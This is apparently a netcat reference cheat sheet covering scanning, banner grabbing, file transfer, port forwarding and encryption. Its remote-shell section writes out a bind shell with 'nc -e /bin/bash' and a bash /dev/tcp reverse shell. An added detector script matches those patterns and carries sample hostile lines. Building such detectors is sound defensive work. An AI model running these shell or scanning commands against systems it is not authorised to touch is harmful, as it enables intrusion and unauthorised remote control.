Overview
Netcat (nc) is a versatile networking utility for reading and writing data across network connections over TCP or UDP. It is often called the “Swiss Army knife” of networking tools.
Key Features
Port scanning
Port listening
File transfer
Network debugging
Port forwarding
Banner grabbing
Proxy functionality
Remote shell capabilities
Installation
Ubuntu (22.04/24.04)
# Traditional netcat
sudo apt install netcat-traditional
# OpenBSD netcat
sudo apt install netcat-openbsd
macOS
# Pre-installed on macOS
# Or install via Homebrew
brew install netcat
Basic Usage
Connection Testing
# Basic client connection
nc hostname port
# Listen for connections (netcat-traditional needs: nc -l -p port)
nc -l port
# Verbose output
nc -v hostname port
# Very verbose output
nc -vv hostname port
TCP/UDP Connections
# TCP connection (default)
nc hostname port
# UDP connection
nc -u hostname port
# Force IPv4
nc -4 hostname port
# Force IPv6
nc -6 hostname port
Port Scanning
Basic Port Scanning
# Scan single port
nc -zv hostname port
# Scan port range
nc -zv hostname port-range
nc -zv hostname 20-100
# Scan multiple ports
nc -zv hostname 22 80 443
Advanced Scanning
# TCP scan with timeout
nc -zvw3 hostname port
# UDP scan
nc -zvu hostname port
# Fast scan (short per-port timeout; in nc, -T sets the IP type of service and is not a speed setting)
nc -zv -w1 hostname port-range
Banner Grabbing
# Get service banner
echo "" | nc -v hostname port
# Grab HTTP header (printf emits real CRLFs in any shell; plain echo may send a literal \r\n)
printf 'HEAD / HTTP/1.0\r\n\r\n' | nc hostname 80
# Extended banner grab
nc -v -w3 hostname port
File Transfer
Basic File Transfer
# Receiver
nc -l port > received_file
# Sender
nc hostname port < file_to_send
Directory Transfer
# Receiver
nc -l port | tar xvf -
# Sender
tar cvf - directory | nc hostname port
With Progress
# Receiver
nc -l port | pv > received_file
# Sender
pv file_to_send | nc hostname port
Remote Shell
Basic Shell Access
# Listener (attacker)
nc -l port -v
# Target (victim)
nc hostname port -e /bin/bash
Reverse Shell
# Listener
nc -l port -v
# Sender
/bin/bash -i >& /dev/tcp/hostname/port 0>&1
Persistent Connection
# Listener with reconnect
while true ; do nc -l port ; done
# Sender with reconnect
while true ; do nc hostname port ; sleep 1 ; done
Proxy and Redirection
Port Forwarding
# Local port forward
nc -l local_port | nc remote_host remote_port
# With bidirectional communication
mkfifo backpipe
nc -l local_port < backpipe | nc remote_host remote_port > backpipe
Proxy Server
# Simple proxy
nc -l local_port | tee -a logfile | nc remote_host remote_port
# With logging
nc -l local_port | tee -a logfile | nc remote_host remote_port | tee -a logfile
Advanced Usage
Custom Protocols
# HTTP GET request
echo -e "GET / HTTP/1.0\r\n\r\n" | nc web_server 80
# SMTP interaction
nc mail_server 25 << EOF
HELO example.com
QUIT
EOF
Debugging
# Debug web server
nc -l 80 -v -k
# Debug mail server
nc -l 25 -v
# Monitor connections
nc -l port -v | tee connection.log
Encryption
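# Using with SSL/TLS (openssl s_client makes the TLS connection itself; nc is not piped into it)
openssl s_client -connect hostname:port
# Encrypted file transfer
# Both sides prompt for the same passphrase; -pbkdf2 replaces the deprecated default key derivation
# Sender
tar czf - files | openssl enc -e -aes256 -pbkdf2 | nc hostname port
# Receiver
nc -l port | openssl enc -d -aes256 -pbkdf2 | tar xzf -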
Security Considerations
Access Control
# Set a timeout in seconds (this is a timeout, not a limit on connection attempts)
nc -l port -w timeout
# Allow only IPv4
nc -4 -l port
# Bind to specific interface
nc -l interface_ip port
Monitoring
# Log all connections
nc -l port -v 2>&1 | tee connection.log
# Monitor with timestamp
nc -l port -v 2>&1 | while IFS= read -r line; do echo "$(date): $line"; done
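The Remote Shell and Port Forwarding invocations earlier on this page are the command lines worth alerting on when they turn up in shell history, process listings or audit logs. The following is an added example, not part of the original cheat sheet, that classifies a command line against those patterns; the rule names and sample lines are constructed.

```shell
# Added example (not from the original page): flag command lines matching the
# remote-shell and relay invocations listed on this page. Rule names are made up.

# nc, ncat or netcat as a command word (start of line, after a space or a "/")
NC='(^|[/[:space:]])(nc|ncat|netcat)[[:space:]]'

# matches REGEX STRING -> exit 0 if STRING matches the extended regex
matches() {
    printf '%s\n' "$2" | grep -Eq -- "$1"
}

# classify_cmdline CMDLINE -> prints one rule name, or "ok"
classify_cmdline() {
    # nc ... -e PROGRAM inside one simple command (no |, ; or & in between)
    if matches "${NC}([^|;&]*[[:space:]])?-[A-Za-z]*e([[:space:]]|\$)" "$1"; then
        echo nc_exec
    # a redirection to bash's /dev/tcp or /dev/udp pseudo-device
    elif matches '[<>]&?[[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+' "$1"; then
        echo dev_tcp_redirect
    # nc piped into nc, optionally through tee (forwarder or logging proxy)
    elif matches "${NC}[^|]*[|][[:space:]]*(tee[[:space:]][^|]*[|][[:space:]]*)?(nc|ncat|netcat)[[:space:]]" "$1"; then
        echo nc_relay
    else
        echo ok
    fi
}

# scan: read command lines on stdin, print "rule<TAB>line" for every hit;
# exit status is 0 only when nothing was flagged
scan() {
    hits=0
    while IFS= read -r line; do
        rule=$(classify_cmdline "$line")
        [ "$rule" = ok ] && continue
        printf '%s\t%s\n' "$rule" "$line"
        hits=$((hits + 1))
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample input (documentation addresses, hypothetical host names)
scan <<'EOF' || true
nc -zv -w3 db01 5432
nc 203.0.113.10 4444 -e /bin/bash
bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
nc -l 8080 < backpipe | nc 10.0.0.5 80 > backpipe
tar cvf - directory | nc 10.0.0.5 9000
EOF
```

Feed `scan` one command line per line; the port scan and the tar transfer in the sample pass, the other three are flagged.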
Best Practices
Connection Testing
# Test with timeout
nc -zv -w3 hostname port
# Verify service
nc -v hostname port < /dev/null
# Check UDP service
nc -zuv hostname port
File Transfer Safety
# Verify transfer
# Sender
md5sum file_to_send
cat file_to_send | nc hostname port
# Receiver
nc -l port | tee received_file | md5sum
Quick Reference
Essential Commands
# Listen mode
nc -l port
# Connect mode
nc hostname port
# Port scan
nc -zv hostname port
# File transfer
nc -l port > file # Receiver
nc hostname port < file # Sender
Common Options
-l # Listen mode
-v # Verbose
-w # Timeout
-z # Zero I/O mode (scanning)
-u # UDP mode
-p # Local port
-e # Execute program (netcat-traditional only; netcat-openbsd has no -e)
Example Use Cases
Web Server Testing
# Basic HTTP request
echo -e "GET / HTTP/1.0\r\n\r\n" | nc web_server 80
# Extended HTTP testing (the blank line before EOF terminates the headers)
cat << EOF | nc web_server 80
GET / HTTP/1.1
Host: web_server
User-Agent: netcat
Connection: close

EOF
Network Debugging
# Simple chat server
nc -l port # Server
nc hostname port # Client
# Port forwarding
nc -l local_port | nc remote_host remote_port
Remember:
Always consider security implications
Use timeouts for connections
Log important operations
Test in safe environment first
Document configurations
Monitor for abuse
For detailed information, consult the man pages (man nc).